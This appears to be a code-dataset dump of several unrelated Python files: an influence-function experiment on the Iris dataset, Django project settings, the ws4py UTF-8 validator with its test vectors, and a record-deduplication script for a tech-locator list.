H_i += torch.autograd.functional.hessian(self.get_loss, weights, vectorize=True)
H = H_i / len(self.x_train)
square_size = int(np.sqrt(torch.numel(H)))
H = H.view(square_size, square_size)
return H
def LiSSA(self, v, weights):
count = 0
cur_estimate = v
damping = 0
scale = 10
num_samples = len(self.x_train)
prev_norm = 1
diff = prev_norm
ihvp = None
for i in range(len(self.x_train)):
self.pointer = i
while diff > 0.00001 and count < 10000:
hvp = torch.autograd.functional.hvp(self.get_train_loss, weights, cur_estimate)[1]
cur_estimate = [a + (1 - damping) * b - c / scale for (a, b, c) in zip(v, cur_estimate, hvp)]
cur_estimate = torch.squeeze(torch.stack(cur_estimate)) # .view(1, -1)
numpy_est = cur_estimate.detach().cpu().numpy()
numpy_est = numpy_est.reshape(1, -1)
count += 1
diff = abs(np.linalg.norm(np.concatenate(numpy_est)) - prev_norm)
prev_norm = np.linalg.norm(np.concatenate(numpy_est))
if ihvp is None:
ihvp = [b/scale for b in cur_estimate]
else:
ihvp = [a + b/scale for (a, b) in zip(ihvp, cur_estimate)]
ihvp = torch.squeeze(torch.stack(ihvp))
ihvp = [a / num_samples for a in ihvp]
ihvp = torch.squeeze(torch.stack(ihvp))
return ihvp.detach()
def i_up_params(self, weights, idx, estimate=False):
i_up_params = list()
if estimate:
for i in idx:
self.pointer = i
grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_params.append(self.LiSSA(torch.autograd.functional.hvp(self.get_train_loss, weights, grad)[1], weights).detach().cpu().numpy())
else:
H = self.get_hessian(self.model.lin_last.weight)
H_inv = torch.inverse(H)
for i in idx:
self.pointer = i
grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
orig_shape = grad.shape
i_up_params.append((H_inv @ grad.float().view(-1, 1)).view(orig_shape).detach().cpu().numpy())
return i_up_params
def i_up_loss(self, weights, idx, estimate=False):
i_up_loss = list()
test_grad = torch.autograd.grad(self.get_test_loss(weights), weights)[0]
if estimate:
for i in idx:
self.pointer = i
train_grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_loss.append((test_grad.view(1, -1) @ self.LiSSA(torch.autograd.functional.hvp(self.get_train_loss,
weights, train_grad)[1], weights).view(-1, 1)).detach().cpu().numpy()[0][0])
else:
H = self.get_hessian(weights)
H_inv = torch.inverse(H)
for i in idx:
self.pointer = i
train_grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_loss.append((test_grad.view(1, -1) @ (H_inv @ train_grad.float().view(-1, 1))).item())
return i_up_loss
def get_hessian_info(model, x, y):
device = 'cuda:0' if next(model.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss()
hessian_comp = hessian(model, criterion, data=(x, y), cuda=True)
top_eigenvalues, top_eigenvector = hessian_comp.eigenvalues()
return top_eigenvalues[-1]
def find_max_loss():
x, y = load_iris(return_X_y=True)
loo = LeaveOneOut()
train_acc, test_loss, y_pred = list(), list(), list()
for train_index, test_index in loo.split(x):
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.fit(x_train, y_train)
train_acc.append(model.score(x_train, y_train))
test_loss.append(model.get_indiv_loss(x_test, y_test))
y_pred.append(torch.argmax(torch.nn.functional.softmax(model(x_test), dim=1)).item())
train_acc = np.mean(train_acc)
test_acc = accuracy_score(y, y_pred)
max_loss = np.argmax(test_loss)
return max_loss, train_acc, test_acc
def find_top_train(max_loss=83):
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.fit(x_train, y_train, 60000)
train_acc = model.score(x_train, y_train)
train_loss = model.get_indiv_loss(x_train, y_train)
to_look = int(1/6 * len(x-1))
top_train = np.argsort(train_loss)[::-1][:to_look]
top_eig = get_hessian_info(model, x_train, y_train)
torch.save(model.state_dict(), 'loo_params_8w.pt')
return top_train, model, top_eig, train_acc
def exact_difference(model, top_train, max_loss):
exact_loss_diff = list()
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
true_loss = model.get_indiv_loss(x_test, y_test)
for i in top_train:
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
x_train, y_train = np.delete(x_train, i, 0), np.delete(y_train, i, 0)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.load_state_dict(torch.load('loo_params_8w.pt'))
model.fit(x_train, y_train, 7500)
exact_loss_diff.append(model.get_indiv_loss(x_test, y_test) - true_loss)
return exact_loss_diff
def approx_difference(model, top_train, max_loss):
model.load_state_dict(torch.load('loo_params_8w.pt'))
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
infl = influence_wrapper(model, x_train, y_train, x_test, y_test)
approx_loss_diff = np.asarray(infl.i_up_loss(model.lin_last.weight, top_train, estimate=False))
return approx_loss_diff
def main():
outer_start_time = time.time()
train, eig, pearson, spearman = list(), list(), list(), list()
for i in range(1):
start_time = time.time()
# max_loss, train_acc, test_acc = find_max_loss() # 83 is always the highest loss then 133, 70, 77
# print('Done max loss')
max_loss = 83
top_train, model, top_eig, train_acc = find_top_train(max_loss)
print('Done top train')
exact_loss_diff = exact_difference(model, top_train, max_loss)
print('Done Exact Diff')
approx_loss_diff = approx_difference(model, top_train, max_loss)
train.append(train_acc)
eig.append(top_eig)
pearson.append(pearsonr(exact_loss_diff, approx_loss_diff)[0])
spearman.append(spearmanr(exact_loss_diff, approx_loss_diff)[0])
print('Done {}/{} in {:.2f} minutes'.format(i+1, 10, (time.time()-start_time)/60))
if i % 10 == 0:
np.save('figure1/det_8w_l2_train.npy', train)
np.save('figure1/det_8w_l2_eig.npy', eig)
np.save('figure1/det_8w_l2_pearson.npy', pearson)
np.save('figure1/det_8w_l2_spearman.npy', spearman)
np.save('figure1/det_8w_l2_train.npy', train)
np.save('figure1/det_8w_l2_eig.npy', eig)
np.save('figure1/det_8w_l2_pearson.npy', pearson)
np.save('figure1/det_8w_l2_spearman.npy', spearman)
print('Finished Iter in {:.2f} minutes'.format((time.time()-outer_start_time)/60))
pass
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
7a883866c1dc23352c28cb30226f37e61c4eecf9 | 13884f547752c1f7d5b45d63a8e3aeebaea5a591 | /newsproject/newsproject/settings.py | 43da654da7fedf2f86c2779e0e66d4df147839d2 | []
| no_license | azharashra05/newsapp_repo | 5139a7d33767b43b83ebc255aa40f2ee6dc17efc | e487ae15f103aa3e0d7b4b405f1c6e2a729ffeb3 | refs/heads/master | 2022-12-10T21:07:49.371475 | 2020-09-05T07:57:28 | 2020-09-05T07:57:28 | 293,029,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,253 | py | """
Django settings for newsproject project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR=os.path.join(BASE_DIR,'templates')
STATIC_DIR=os.path.join(BASE_DIR,'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ak9*^19hq5aeh9+i=v4#3vm7_@tce4i#bf5d!hfw_camqsz0re'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'newsapp'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'newsproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'newsproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[
STATIC_DIR,
]
| [
"[email protected]"
]
| |
43a1a88455943cde239ee14c15fa12fc73f1c4f9 | 3cf5638a12bb6a03a40aaffcab15b1789546948d | /ws4py/utf8validator.py | b457768a61646dc7cb6de895077c599b37bfe646 | []
| no_license | GDur/LiveProcessingJs | 8afeed64777d1df977967856f2c8b592ff671438 | 7b2c5a0e4cee0926a8c289e297cdb470a7fe48b2 | refs/heads/master | 2016-09-06T07:55:21.240721 | 2012-12-08T11:14:19 | 2012-12-08T11:14:19 | 6,513,730 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,283 | py | # coding=utf-8
###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Note:
##
## This code is a Python implementation of the algorithm
##
## "Flexible and Economical UTF-8 Decoder"
##
## by Bjoern Hoehrmann
##
## [email protected]
## http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
class Utf8Validator:
"""
Incremental UTF-8 validator with constant memory consumption (minimal state).
Implements the algorithm "Flexible and Economical UTF-8 Decoder" by
Bjoern Hoehrmann (http://bjoern.hoehrmann.de/utf-8/decoder/dfa/).
"""
## DFA transitions
UTF8VALIDATOR_DFA = [
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 00..1f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 20..3f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 40..5f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 60..7f
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9, # 80..9f
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7, # a0..bf
8,8,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2, # c0..df
0xa,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x4,0x3,0x3, # e0..ef
0xb,0x6,0x6,0x6,0x5,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8, # f0..ff
0x0,0x1,0x2,0x3,0x5,0x8,0x7,0x1,0x1,0x1,0x4,0x6,0x1,0x1,0x1,0x1, # s0..s0
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1, # s1..s2
1,2,1,1,1,1,1,2,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1, # s3..s4
1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,3,1,3,1,1,1,1,1,1, # s5..s6
1,3,1,1,1,1,1,3,1,3,1,1,1,1,1,1,1,3,1,1,1,1,1,1,1,1,1,1,1,1,1,1, # s7..s8
]
UTF8_ACCEPT = 0
UTF8_REJECT = 1
def __init__(self):
self.reset()
def decode(self, b):
"""
Eat one UTF-8 octet, and validate on the fly.
Returns UTF8_ACCEPT when enough octets have been consumed, in which case
self.codepoint contains the decoded Unicode code point.
Returns UTF8_REJECT when invalid UTF-8 was encountered.
Returns some other positive integer when more octets need to be eaten.
"""
type = Utf8Validator.UTF8VALIDATOR_DFA[b]
if self.state != Utf8Validator.UTF8_ACCEPT:
self.codepoint = (b & 0x3f) | (self.codepoint << 6)
else:
self.codepoint = (0xff >> type) & b
self.state = Utf8Validator.UTF8VALIDATOR_DFA[256 + self.state * 16 + type]
return self.state
def reset(self):
"""
Reset validator to start new incremental UTF-8 decode/validation.
"""
self.state = Utf8Validator.UTF8_ACCEPT
self.codepoint = 0
self.i = 0
def validate(self, ba):
"""
Incrementally validate a chunk of bytes provided as bytearray.
Will return a quad (valid?, endsOnCodePoint?, currentIndex, totalIndex).
As soon as an octet is encountered which renders the octet sequence
invalid, a quad with valid? == False is returned. currentIndex returns
the index within the currently consumed chunk, and totalIndex the
index within the total consumed sequence that was the point of bail out.
When valid? == True, currentIndex will be len(ba) and totalIndex the
total amount of consumed bytes.
"""
l = len(ba)
for i in xrange(0, l):
## optimized version of decode(), since we are not interested in actual code points
self.state = Utf8Validator.UTF8VALIDATOR_DFA[256 + (self.state << 4) + Utf8Validator.UTF8VALIDATOR_DFA[ba[i]]]
if self.state == Utf8Validator.UTF8_REJECT:
self.i += i
return False, False, i, self.i
self.i += l
return True, self.state == Utf8Validator.UTF8_ACCEPT, l, self.i
UTF8_TEST_SEQUENCES = []
def setTestSequences():
"""
Setup test sequences for UTF-8 decoder tests from
http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
"""
# 1 Some correct UTF-8 text
vss = '\xce\xba\xe1\xbd\xb9\xcf\x83\xce\xbc\xce\xb5'
vs = ["Some valid UTF-8 sequences", []]
vs[1].append((True, vss))
UTF8_TEST_SEQUENCES.append(vs)
# All prefixes of correct UTF-8 text
vs = ["All prefixes of a valid UTF-8 string that contains multi-byte code points", []]
v = Utf8Validator()
for i in xrange(1, len(vss) + 1):
v.reset()
res = v.validate(bytearray(vss[:i]))
vs[1].append((res[0] and res[1], vss[:i]))
UTF8_TEST_SEQUENCES.append(vs)
# 2.1 First possible sequence of a certain length
vs = ["First possible sequence of a certain length", []]
vs[1].append((True, '\x00'))
vs[1].append((True, '\xc2\x80'))
vs[1].append((True, '\xe0\xa0\x80'))
vs[1].append((True, '\xf0\x90\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# the following conform to the UTF-8 integer encoding scheme, but
# valid UTF-8 only allows for Unicode code points up to U+10FFFF
vs = ["First possible sequence length 5/6 (invalid codepoints)", []]
vs[1].append((False, '\xf8\x88\x80\x80\x80'))
vs[1].append((False, '\xfc\x84\x80\x80\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 2.2 Last possible sequence of a certain length
vs = ["Last possible sequence of a certain length", []]
vs[1].append((True, '\x7f'))
vs[1].append((True, '\xdf\xbf'))
vs[1].append((True, '\xef\xbf\xbf'))
vs[1].append((True, '\xf4\x8f\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# the following conform to the UTF-8 integer encoding scheme, but
# valid UTF-8 only allows for Unicode code points up to U+10FFFF
vs = ["Last possible sequence length 4/5/6 (invalid codepoints)", []]
vs[1].append((False, '\xf7\xbf\xbf\xbf'))
vs[1].append((False, '\xfb\xbf\xbf\xbf\xbf'))
vs[1].append((False, '\xfd\xbf\xbf\xbf\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 2.3 Other boundary conditions
vs = ["Other boundary conditions", []]
vs[1].append((True, '\xed\x9f\xbf'))
vs[1].append((True, '\xee\x80\x80'))
vs[1].append((True, '\xef\xbf\xbd'))
vs[1].append((True, '\xf4\x8f\xbf\xbf'))
vs[1].append((False, '\xf4\x90\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 3.1 Unexpected continuation bytes
vs = ["Unexpected continuation bytes", []]
vs[1].append((False, '\x80'))
vs[1].append((False, '\xbf'))
vs[1].append((False, '\x80\xbf'))
vs[1].append((False, '\x80\xbf\x80'))
vs[1].append((False, '\x80\xbf\x80\xbf'))
vs[1].append((False, '\x80\xbf\x80\xbf\x80'))
vs[1].append((False, '\x80\xbf\x80\xbf\x80\xbf'))
s = ""
for i in xrange(0x80, 0xbf):
s += chr(i)
vs[1].append((False, s))
UTF8_TEST_SEQUENCES.append(vs)
# 3.2 Lonely start characters
vs = ["Lonely start characters", []]
m = [(0xc0, 0xdf), (0xe0, 0xef), (0xf0, 0xf7), (0xf8, 0xfb), (0xfc, 0xfd)]
for mm in m:
s = ''
for i in xrange(mm[0], mm[1]):
s += chr(i)
s += chr(0x20)
vs[1].append((False, s))
UTF8_TEST_SEQUENCES.append(vs)
# 3.3 Sequences with last continuation byte missing
vs = ["Sequences with last continuation byte missing", []]
k = ['\xc0', '\xe0\x80', '\xf0\x80\x80', '\xf8\x80\x80\x80', '\xfc\x80\x80\x80\x80',
'\xdf', '\xef\xbf', '\xf7\xbf\xbf', '\xfb\xbf\xbf\xbf', '\xfd\xbf\xbf\xbf\xbf']
for kk in k:
vs[1].append((False, kk))
UTF8_TEST_SEQUENCES.append(vs)
# 3.4 Concatenation of incomplete sequences
vs = ["Concatenation of incomplete sequences", []]
vs[1].append((False, ''.join(k)))
UTF8_TEST_SEQUENCES.append(vs)
# 3.5 Impossible bytes
vs = ["Impossible bytes", []]
vs[1].append((False, '\xfe'))
vs[1].append((False, '\xff'))
vs[1].append((False, '\xfe\xfe\xff\xff'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.1 Examples of an overlong ASCII character
vs = ["Examples of an overlong ASCII character", []]
vs[1].append((False, '\xc0\xaf'))
vs[1].append((False, '\xe0\x80\xaf'))
vs[1].append((False, '\xf0\x80\x80\xaf'))
vs[1].append((False, '\xf8\x80\x80\x80\xaf'))
vs[1].append((False, '\xfc\x80\x80\x80\x80\xaf'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.2 Maximum overlong sequences
vs = ["Maximum overlong sequences", []]
vs[1].append((False, '\xc1\xbf'))
vs[1].append((False, '\xe0\x9f\xbf'))
vs[1].append((False, '\xf0\x8f\xbf\xbf'))
vs[1].append((False, '\xf8\x87\xbf\xbf\xbf'))
vs[1].append((False, '\xfc\x83\xbf\xbf\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.3 Overlong representation of the NUL character
vs = ["Overlong representation of the NUL character", []]
vs[1].append((False, '\xc0\x80'))
vs[1].append((False, '\xe0\x80\x80'))
vs[1].append((False, '\xf0\x80\x80\x80'))
vs[1].append((False, '\xf8\x80\x80\x80\x80'))
vs[1].append((False, '\xfc\x80\x80\x80\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.1 Single UTF-16 surrogates
vs = ["Single UTF-16 surrogates", []]
vs[1].append((False, '\xed\xa0\x80'))
vs[1].append((False, '\xed\xad\xbf'))
vs[1].append((False, '\xed\xae\x80'))
vs[1].append((False, '\xed\xaf\xbf'))
vs[1].append((False, '\xed\xb0\x80'))
vs[1].append((False, '\xed\xbe\x80'))
vs[1].append((False, '\xed\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.2 Paired UTF-16 surrogates
vs = ["Paired UTF-16 surrogates", []]
vs[1].append((False, '\xed\xa0\x80\xed\xb0\x80'))
vs[1].append((False, '\xed\xa0\x80\xed\xbf\xbf'))
vs[1].append((False, '\xed\xad\xbf\xed\xb0\x80'))
vs[1].append((False, '\xed\xad\xbf\xed\xbf\xbf'))
vs[1].append((False, '\xed\xae\x80\xed\xb0\x80'))
vs[1].append((False, '\xed\xae\x80\xed\xbf\xbf'))
vs[1].append((False, '\xed\xaf\xbf\xed\xb0\x80'))
vs[1].append((False, '\xed\xaf\xbf\xed\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.3 Other illegal code positions
# Those are non-character code points and valid UTF-8 by RFC 3629
vs = ["Non-character code points (valid UTF-8)", []]
vs[1].append((True, '\xef\xbf\xbe'))
vs[1].append((True, '\xef\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# Unicode replacement character
vs = ["Unicode replacement character", []]
vs[1].append((True, '\xef\xbf\xbd'))
UTF8_TEST_SEQUENCES.append(vs)
setTestSequences()
def test_utf8():
"""
These tests verify the UTF-8 decoder/validator on the various test cases from
http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
"""
v = Utf8Validator()
vs = []
for k in UTF8_TEST_SEQUENCES:
vs.extend(k[1])
# All Unicode code points
for i in xrange(0, 0xffff): # should by 0x10ffff, but non-wide Python build is limited to 16-bits
if i < 0xD800 or i > 0xDFFF: # filter surrogate code points, which are disallowed to encode in UTF-8
vs.append((True, unichr(i).encode("utf-8")))
# 5.1 Single UTF-16 surrogates
for i in xrange(0xD800, 0xDBFF): # high-surrogate
ss = unichr(i).encode("utf-8")
vs.append((False, ss))
for i in xrange(0xDC00, 0xDFFF): # low-surrogate
ss = unichr(i).encode("utf-8")
vs.append((False, ss))
# 5.2 Paired UTF-16 surrogates
for i in xrange(0xD800, 0xDBFF): # high-surrogate
for j in xrange(0xDC00, 0xDFFF): # low-surrogate
ss1 = unichr(i).encode("utf-8")
ss2 = unichr(j).encode("utf-8")
vs.append((False, ss1 + ss2))
vs.append((False, ss2 + ss1))
# now test and assert ..
for s in vs:
v.reset()
r = v.validate(bytearray(s[1]))
res = r[0] and r[1] # no UTF-8 decode error and everything consumed
assert res == s[0]
def test_utf8_incremental():
"""
These tests verify that the UTF-8 decoder/validator can operate incrementally.
"""
v = Utf8Validator()
v.reset()
assert (True, True, 15, 15) == v.validate(bytearray("µ@ßöäüàá"))
v.reset()
assert (False, False, 0, 0) == v.validate(bytearray([0xF5]))
## the following 3 all fail on eating byte 7 (0xA0)
v.reset()
assert (True, True, 6, 6) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74, 0x65, 0x64]))
assert (False, False, 1, 7) == v.validate(bytearray([0xED, 0xA0, 0x80]))
v.reset()
assert (True, True, 4, 4) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74]))
assert (False, False, 3, 7) == v.validate(bytearray([0x65, 0x64, 0xED, 0xA0, 0x80]))
v.reset()
assert (True, False, 7, 7) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74, 0x65, 0x64, 0xED]))
assert (False, False, 0, 7) == v.validate(bytearray([0xA0, 0x80]))
if __name__ == '__main__':
"""
Run unit tests.
"""
test_utf8_incremental()
test_utf8()
| [
"[email protected]"
]
| |
a382122e088d085ebf613ab22954c0a051260e01 | 332e0fe0e109795a838ab75f91cacbd818eb8f26 | /examples/tech_locator.py | 430a9d69cc57fcef52eece431039f3d98c927476 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | yoyossy/open-city__dedupe | 08fb505dda14992cd35fd41c0ff5c5fb98d54d68 | 187d0d6eeeba23046d7155fb9e593b36e21388fe | refs/heads/master | 2021-01-15T19:22:36.191934 | 2012-07-23T14:48:39 | 2012-07-23T14:48:39 | 5,244,938 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,104 | py | import csv
import re
import os
#dedupe modules
from dedupe.training_sample import activeLearning, consoleLabel
from dedupe.blocking import trainBlocking, blockingIndex, mergeBlocks
from dedupe.predicates import *
import dedupe.core
import dedupe.clustering
def techLocatorImport(filename) :
data_d = {}
duplicates_d = {}
with open(filename) as f :
reader = csv.reader(f, delimiter=',', quotechar='"')
header = reader.next()
for i, row in enumerate(reader) :
instance = {}
for j, col in enumerate(row) :
col = re.sub(' +', ' ', col)
col = re.sub('\n', ' ', col)
instance[header[j]] = col.strip().strip('"').strip("'").lower()
data_d[i] = dedupe.core.frozendict(instance)
return(data_d, header)
def dataModel() :
return {'fields':
{ 'OrganizationName' : {'type': 'String', 'weight' : 0},
'Address' : {'type': 'String', 'weight' : 0},
'ZipCode' : {'type': 'String', 'weight' : 0},
'OrgPhone' : {'type': 'String', 'weight' : 0}
},
'bias' : 0}
def init(inputFile) :
data_d, header = techLocatorImport(inputFile)
data_model = dataModel()
return (data_d, data_model, header)
# user defined function to label pairs as duplicates or non-duplicates
def dictSubset(d, keys) :
return dict((k,d[k]) for k in keys if k in d)
inputFile = "datasets/Tech Locator Master List.csv"
num_training_dupes = 200
num_training_distinct = 16000
numIterations = 100
numTrainingPairs = 30
import time
t0 = time.time()
data_d, data_model, header = init(inputFile)
print "importing data ..."
if os.path.exists('learned_settings.json') :
data_model, predicates = core.readSettings('learned_settings.json')
else:
#lets do some active learning here
training_data, training_pairs, data_model = activeLearning(data_d, data_model, consoleLabel, numTrainingPairs)
predicates = trainBlocking(training_pairs,
(wholeFieldPredicate,
tokenFieldPredicate,
commonIntegerPredicate,
sameThreeCharStartPredicate,
sameFiveCharStartPredicate,
sameSevenCharStartPredicate,
nearIntegersPredicate,
commonFourGram,
commonSixGram),
data_model, 1, 1)
core.writeSettings('learned_settings.json',
data_model,
predicates)
blocked_data = blockingIndex(data_d, predicates)
candidates = mergeBlocks(blocked_data)
print ""
print "Blocking reduced the number of comparisons by",
print int((1-len(candidates)/float(0.5*len(data_d)**2))*100),
print "%"
print "We'll make",
print len(candidates),
print "comparisons."
print "Learned Weights"
for k1, v1 in data_model.items() :
try:
for k2, v2 in v1.items() :
print (k2, v2['weight'])
except :
print (k1, v1)
print ""
print "finding duplicates ..."
print ""
dupes = core.scoreDuplicates(candidates, data_d, data_model, .5)
clustered_dupes = clustering.cluster(dupes, estimated_dupe_fraction = 0.4)
print "# duplicate sets"
print len(clustered_dupes)
orig_data = {}
with open(inputFile) as f :
reader = csv.reader(f)
reader.next()
for row_id, row in enumerate(reader) :
orig_data[row_id] = row
with open("output/TL_dupes_list_" + str(time.time()) + ".csv","w") as f :
writer = csv.writer(f)
heading_row = header
heading_row.insert(0, "Group_ID")
writer.writerow(heading_row)
dupe_id_list = []
for group_id, cluster in enumerate(clustered_dupes, 1) :
for candidate in sorted(cluster) :
dupe_id_list.append(candidate)
row = orig_data[candidate]
row.insert(0, group_id)
writer.writerow(row)
for id in orig_data :
if not id in set(dupe_id_list) :
row = orig_data[id]
row.insert(0, 'x')
writer.writerow(row)
print "ran in ", time.time() - t0, "seconds"
| [
"[email protected]"
]
| |
de7ede51aae8aea701206a53f518f0d5ac082ce5 | 0090d4ab68de301b77c6c69a58464136fa04ba49 | /trydjango/settings.py | a3933049574711d35e99e5e238ad8b94b8ac109f | []
| no_license | firdavsDev/Django_simple_blog | b70000194875d792838f916d035b89be59312cd9 | f5999cf30091fce2246f44a5a55d55071aeb7a99 | refs/heads/main | 2023-08-23T04:10:52.570457 | 2021-09-23T10:19:18 | 2021-09-23T10:19:18 | 409,543,186 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,905 | py | """
Django settings for trydjango project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent #bu faylar qayerda turganligini saqlaydi
# Quick-start development settings - unsuitable for production
